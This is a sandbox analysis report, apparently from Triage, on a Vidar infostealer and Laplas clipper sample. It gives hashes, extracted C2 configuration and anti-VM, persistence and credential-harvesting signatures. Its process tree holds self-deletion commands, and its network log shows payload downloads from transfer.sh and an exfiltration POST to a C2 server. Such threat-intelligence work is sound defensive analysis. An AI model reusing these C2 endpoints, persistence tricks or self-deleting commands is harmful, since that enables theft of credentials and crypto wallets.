laplas | 3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0 | Triage

Analysis

max time kernel
147s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
22/04/2023, 07:50 UTC

Sharing

Report Analysis Logs

General

Target

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe
Size

367KB
MD5

5100184c193417e15ce478809f1f3954
SHA1

9e1bd46562fcd313c1d699c38e209eccafa08863
SHA256

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0
SHA512

83ea5a6cb41a400e959b1355fa1968769c86d0f5ea67f473e48254795374ce7ef54a7150a54dd6199949d146eaa81ba2ce69502367931bf42162bbda9264fd31
SSDEEP

6144:mKP0YUqzhuW03U9ni8iFUIUWB1QPArq6HVnWd7Pno8U:xP0Fmh9nniFUIUWB1QI+6HVnWVnK

Score

10^/10

laplas vidar 2234cb18bdcd93ea6f4e5f1473025a81 clipper discovery evasion persistence spyware stealer trojan upx

Malware Config

Extracted

Family

vidar

Version

3.5

Botnet

2234cb18bdcd93ea6f4e5f1473025a81

C2

https://steamcommunity.com/profiles/76561199497218285

https://t.me/tg_duckworld

Attributes

profile_id_v2
2234cb18bdcd93ea6f4e5f1473025a81
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7

Extracted

Family

laplas

C2

http://89.23.97.128

Attributes

api_key
bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

Signatures

Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	56837215763512396225.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ntlhost.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	56837215763512396225.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	56837215763512396225.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ntlhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ntlhost.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Executes dropped EXE 3 IoCs

pid	Process
5000	56837215763512396225.exe
4560	14267828231399238978.exe
4852	ntlhost.exe

Loads dropped DLL 2 IoCs

pid	Process
4640	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe
4640	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

resource	yara_rule
behavioral1/files/0x0008000000023159-246.dat	upx
behavioral1/files/0x0008000000023159-249.dat	upx
behavioral1/files/0x0008000000023159-248.dat	upx
behavioral1/memory/4560-250-0x0000000000310000-0x0000000001174000-memory.dmp	upx
behavioral1/memory/4560-251-0x0000000000310000-0x0000000001174000-memory.dmp	upx

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	56837215763512396225.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	56837215763512396225.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ntlhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
5000	56837215763512396225.exe
4852	ntlhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
392	4640	WerFault.exe	84

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
4536	timeout.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	68	Go-http-client/1.1

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4640	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe
4640	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 4640 wrote to memory of 5000	4640	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe	91
PID 4640 wrote to memory of 5000	4640	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe	91
PID 4640 wrote to memory of 4560	4640	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe	94
PID 4640 wrote to memory of 4560	4640	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe	94
PID 4560 wrote to memory of 1252	4560	14267828231399238978.exe	96
PID 4560 wrote to memory of 1252	4560	14267828231399238978.exe	96
PID 4640 wrote to memory of 4336	4640	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe	95
PID 4640 wrote to memory of 4336	4640	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe	95
PID 4640 wrote to memory of 4336	4640	3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe	95
PID 1252 wrote to memory of 3612	1252	cmd.exe	101
PID 1252 wrote to memory of 3612	1252	cmd.exe	101
PID 4336 wrote to memory of 4536	4336	cmd.exe	102
PID 4336 wrote to memory of 4536	4336	cmd.exe	102
PID 4336 wrote to memory of 4536	4336	cmd.exe	102
PID 5000 wrote to memory of 4852	5000	56837215763512396225.exe	103
PID 5000 wrote to memory of 4852	5000	56837215763512396225.exe	103

C:\Users\Admin\AppData\Local\Temp\3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe
"C:\Users\Admin\AppData\Local\Temp\3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4640
- C:\ProgramData\56837215763512396225.exe
  "C:\ProgramData\56837215763512396225.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of WriteProcessMemory
  PID:5000
- - C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:4852
- C:\ProgramData\14267828231399238978.exe
  "C:\ProgramData\14267828231399238978.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\14267828231399238978.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1252
  - - C:\Windows\system32\choice.exe
      choice /C Y /N /D Y /T 0
      4⤵
      PID:3612
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe" & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:4536
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 2144
  2⤵
  - Program crash
  PID:392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4640 -ip 4640
1⤵
PID:2900

Network

DNS

14.110.152.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.110.152.52.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

23.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.159.190.20.in-addr.arpa

IN PTR

Response
DNS

t.me

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
GET

https://t.me/tg_duckworld

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Remote address:

149.154.167.99:443

Request

GET /tg_duckworld HTTP/1.1
X-Id: 2234cb18bdcd93ea6f4e5f1473025a81
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
Host: t.me

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sat, 22 Apr 2023 07:51:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12403
Connection: keep-alive
Set-Cookie: stel_ssid=3f7643dbc2f16d73e3_15871525979508276845; expires=Sun, 23 Apr 2023 07:51:00 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
GET

http://116.203.15.24/

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Remote address:

116.203.15.24:80

Request

GET / HTTP/1.1
X-Id: 2234cb18bdcd93ea6f4e5f1473025a81
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7
Host: 116.203.15.24

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 22 Apr 2023 07:51:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://116.203.15.24/install.zip

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Remote address:

116.203.15.24:80

Request

GET /install.zip HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7
Host: 116.203.15.24
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 22 Apr 2023 07:51:01 GMT
Content-Type: application/zip
Content-Length: 2685679
Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
Connection: keep-alive
ETag: "631f30d3-28faef"
Accept-Ranges: bytes
POST

http://116.203.15.24/

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Remote address:

116.203.15.24:80

Request

POST / HTTP/1.1
X-Id: 2234cb18bdcd93ea6f4e5f1473025a81
X-Token: c8e47bb48f9aa36bc82b6938b96ff9de
X-hwid: 6a6e85ce7489514701825-7669410e-8e67-41c6-8402-8218-806e6f6e6963
Content-Type: multipart/form-data; boundary=----7552215081202756
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7
Host: 116.203.15.24
Content-Length: 208611
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sat, 22 Apr 2023 07:51:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

99.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.167.154.149.in-addr.arpa

IN PTR

Response
DNS

22.249.124.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.249.124.192.in-addr.arpa

IN PTR

Response

22.249.124.192.in-addr.arpa

IN PTR

cloudproxy10022sucurinet
DNS

24.15.203.116.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.15.203.116.in-addr.arpa

IN PTR

Response

24.15.203.116.in-addr.arpa

IN PTR

static2415203116clientsyour-serverde
DNS

transfer.sh

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Remote address:

8.8.8.8:53

Request

transfer.sh

IN A

Response

transfer.sh

IN A

144.76.136.153
GET

https://transfer.sh/get/p1spJs/vasya.exe

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Remote address:

144.76.136.153:443

Request

GET /get/p1spJs/vasya.exe HTTP/1.1
Host: transfer.sh
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sat, 22 Apr 2023 07:51:11 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 3163136
Connection: keep-alive
Cache-Control: no-store
Content-Disposition: attachment; filename="vasya.exe"
Retry-After: Sat, 22 Apr 2023 09:51:12 GMT
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1682149872
X-Remaining-Days: n/a
X-Remaining-Downloads: n/a
X-Served-By: Proudly served by DutchCoders
Strict-Transport-Security: max-age=63072000
GET

https://transfer.sh/get/eQc9fI/sosiska.exe

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

Remote address:

144.76.136.153:443

Request

GET /get/eQc9fI/sosiska.exe HTTP/1.1
Host: transfer.sh
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sat, 22 Apr 2023 07:51:20 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4515328
Connection: keep-alive
Cache-Control: no-store
Content-Disposition: attachment; filename="sosiska.exe"
Retry-After: Sat, 22 Apr 2023 09:51:18 GMT
X-Made-With: <3 by DutchCoders
X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
X-Ratelimit-Limit: 10
X-Ratelimit-Rate: 600
X-Ratelimit-Remaining: 9
X-Ratelimit-Reset: 1682149878
X-Remaining-Days: n/a
X-Remaining-Downloads: n/a
X-Served-By: Proudly served by DutchCoders
Strict-Transport-Security: max-age=63072000
DNS

153.136.76.144.in-addr.arpa

Remote address:

8.8.8.8:53

Request

153.136.76.144.in-addr.arpa

IN PTR

Response

153.136.76.144.in-addr.arpa

IN PTR

transfersh
DNS

67.55.52.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.55.52.23.in-addr.arpa

IN PTR

Response

67.55.52.23.in-addr.arpa

IN PTR

a23-52-55-67deploystaticakamaitechnologiescom
DNS

9.175.53.84.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.175.53.84.in-addr.arpa

IN PTR

Response

9.175.53.84.in-addr.arpa

IN PTR

a84-53-175-9deploystaticakamaitechnologiescom
DNS

28.118.140.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

28.118.140.52.in-addr.arpa

IN PTR

Response
DNS

103.169.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.169.127.40.in-addr.arpa

IN PTR

Response
DNS

2.36.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.36.159.162.in-addr.arpa

IN PTR

Response
DNS

103.169.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.169.127.40.in-addr.arpa

IN PTR

Response
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

50.4.107.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.4.107.13.in-addr.arpa

IN PTR

Response
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
GET

http://89.23.97.128/bot/regex

ntlhost.exe

Remote address:

89.23.97.128:80

Request

GET /bot/regex HTTP/1.1
Host: 89.23.97.128
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Apr 2023 07:51:43 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://89.23.97.128/bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=UXINIZSV\Admin

ntlhost.exe

Remote address:

89.23.97.128:80

Request

GET /bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=UXINIZSV\Admin HTTP/1.1
Host: 89.23.97.128
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Apr 2023 07:51:43 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
GET

http://89.23.97.128/bot/regex

ntlhost.exe

Remote address:

89.23.97.128:80

Request

GET /bot/regex HTTP/1.1
Host: 89.23.97.128
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Apr 2023 07:52:44 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://89.23.97.128/bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=UXINIZSV\Admin

ntlhost.exe

Remote address:

89.23.97.128:80

Request

GET /bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=UXINIZSV\Admin HTTP/1.1
Host: 89.23.97.128
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Apr 2023 07:52:44 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
DNS

64.13.109.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.13.109.52.in-addr.arpa

IN PTR

Response
DNS

128.97.23.89.in-addr.arpa

Remote address:

8.8.8.8:53

Request

128.97.23.89.in-addr.arpa

IN PTR

Response

52.152.110.14:443

276 B
6
52.152.110.14:443

260 B
5
149.154.167.99:443

https://t.me/tg_duckworld

tls, http

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

1.6kB
19.5kB
24
20

HTTP Request

GET https://t.me/tg_duckworld

HTTP Response

200
116.203.15.24:80

http://116.203.15.24/

http

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

320.4kB
2.8MB
2146
2063

HTTP Request

GET http://116.203.15.24/

HTTP Response

200

HTTP Request

GET http://116.203.15.24/install.zip

HTTP Response

200

HTTP Request

POST http://116.203.15.24/

HTTP Response

200
144.76.136.153:443

https://transfer.sh/get/eQc9fI/sosiska.exe

tls, http

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

262.2kB
7.9MB
5688
5674

HTTP Request

GET https://transfer.sh/get/p1spJs/vasya.exe

HTTP Response

200

HTTP Request

GET https://transfer.sh/get/eQc9fI/sosiska.exe

HTTP Response

200
20.42.73.25:443

322 B
7
89.23.97.128:80

http://89.23.97.128/bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=UXINIZSV\Admin

http

ntlhost.exe

1.0kB
2.6kB
10
12

HTTP Request

GET http://89.23.97.128/bot/regex

HTTP Response

200

HTTP Request

GET http://89.23.97.128/bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=UXINIZSV\Admin

HTTP Response

200

HTTP Request

GET http://89.23.97.128/bot/regex

HTTP Response

200

HTTP Request

GET http://89.23.97.128/bot/online?key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396&guid=UXINIZSV\Admin

HTTP Response

200
209.197.3.8:80

322 B
7
209.197.3.8:80

322 B
7
173.223.113.164:443

322 B
7
173.223.113.131:80

322 B
7
204.79.197.203:80

322 B
7

8.8.8.8:53

14.110.152.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

14.110.152.52.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

23.159.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

23.159.190.20.in-addr.arpa
8.8.8.8:53

t.me

dns

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

50 B
66 B
1
1

DNS Request

t.me

DNS Response

149.154.167.99
8.8.8.8:53

99.167.154.149.in-addr.arpa

dns

73 B
166 B
1
1

DNS Request

99.167.154.149.in-addr.arpa
8.8.8.8:53

22.249.124.192.in-addr.arpa

dns

73 B
113 B
1
1

DNS Request

22.249.124.192.in-addr.arpa
8.8.8.8:53

24.15.203.116.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

24.15.203.116.in-addr.arpa
8.8.8.8:53

transfer.sh

dns

3ed454b0e186effc5bb941a65d0f2ec23abedb1453fee74c4b1969948651ddf0.exe

57 B
73 B
1
1

DNS Request

transfer.sh

DNS Response

144.76.136.153
8.8.8.8:53

153.136.76.144.in-addr.arpa

dns

73 B
98 B
1
1

DNS Request

153.136.76.144.in-addr.arpa
8.8.8.8:53

67.55.52.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

67.55.52.23.in-addr.arpa
8.8.8.8:53

9.175.53.84.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

9.175.53.84.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

103.169.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

103.169.127.40.in-addr.arpa
8.8.8.8:53

2.36.159.162.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

2.36.159.162.in-addr.arpa
8.8.8.8:53

103.169.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

103.169.127.40.in-addr.arpa
8.8.8.8:53

157.123.68.40.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

157.123.68.40.in-addr.arpa
8.8.8.8:53

50.4.107.13.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.4.107.13.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

64.13.109.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

64.13.109.52.in-addr.arpa
8.8.8.8:53

128.97.23.89.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

128.97.23.89.in-addr.arpa

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

Privilege Escalation

Defense Evasion

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Credentials in Files

Discovery

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion

Lateral Movement

Collection

Data from Local System

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\14267828231399238978.exe

Filesize
4.3MB

MD5
196a4cdba36b3fe8f82a215732c486b4

SHA1
9186f53143e01b28af100e1000eb443e6afbe292

SHA256
651e80215fee5757287bd028e7cda4a67865f0c6e0cad46c82706bf0e2565478

SHA512
5e0fc394e6cf8ee16f1227ebbb3ef02ad17c0da9bbf1c51ebcec4ca9343d6993305b26bf2f8ab0b326a2af87797a6d75bc2c544bf8503f3d55347d47ec159143

Download Submit
C:\ProgramData\14267828231399238978.exe

Filesize
4.3MB

MD5
196a4cdba36b3fe8f82a215732c486b4

SHA1
9186f53143e01b28af100e1000eb443e6afbe292

SHA256
651e80215fee5757287bd028e7cda4a67865f0c6e0cad46c82706bf0e2565478

SHA512
5e0fc394e6cf8ee16f1227ebbb3ef02ad17c0da9bbf1c51ebcec4ca9343d6993305b26bf2f8ab0b326a2af87797a6d75bc2c544bf8503f3d55347d47ec159143

Download Submit
C:\ProgramData\14267828231399238978.exe

Filesize
4.3MB

MD5
196a4cdba36b3fe8f82a215732c486b4

SHA1
9186f53143e01b28af100e1000eb443e6afbe292

SHA256
651e80215fee5757287bd028e7cda4a67865f0c6e0cad46c82706bf0e2565478

SHA512
5e0fc394e6cf8ee16f1227ebbb3ef02ad17c0da9bbf1c51ebcec4ca9343d6993305b26bf2f8ab0b326a2af87797a6d75bc2c544bf8503f3d55347d47ec159143

Download Submit
C:\ProgramData\56837215763512396225.exe

Filesize
3.0MB

MD5
e81570d802d26df3dde953770c8c9766

SHA1
d8df423343b59f8b53f10722b023622477e5fb31

SHA256
e1290a9463ef7d1d61645b7d3fd3e4a7518023091f85ab4085308f70d437707f

SHA512
1d03bc26a97b4eb680fe9d1996c525e086f6efcb40db2946e7297544a85cd0b6999ac03ed11048dc424631a643ba95a0624865351e86fb76ebc61641c73b7778

Download Submit
C:\ProgramData\56837215763512396225.exe

Filesize
3.0MB

MD5
e81570d802d26df3dde953770c8c9766

SHA1
d8df423343b59f8b53f10722b023622477e5fb31

SHA256
e1290a9463ef7d1d61645b7d3fd3e4a7518023091f85ab4085308f70d437707f

SHA512
1d03bc26a97b4eb680fe9d1996c525e086f6efcb40db2946e7297544a85cd0b6999ac03ed11048dc424631a643ba95a0624865351e86fb76ebc61641c73b7778

Download Submit
C:\ProgramData\56837215763512396225.exe

Filesize
3.0MB

MD5
e81570d802d26df3dde953770c8c9766

SHA1
d8df423343b59f8b53f10722b023622477e5fb31

SHA256
e1290a9463ef7d1d61645b7d3fd3e4a7518023091f85ab4085308f70d437707f

SHA512
1d03bc26a97b4eb680fe9d1996c525e086f6efcb40db2946e7297544a85cd0b6999ac03ed11048dc424631a643ba95a0624865351e86fb76ebc61641c73b7778

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
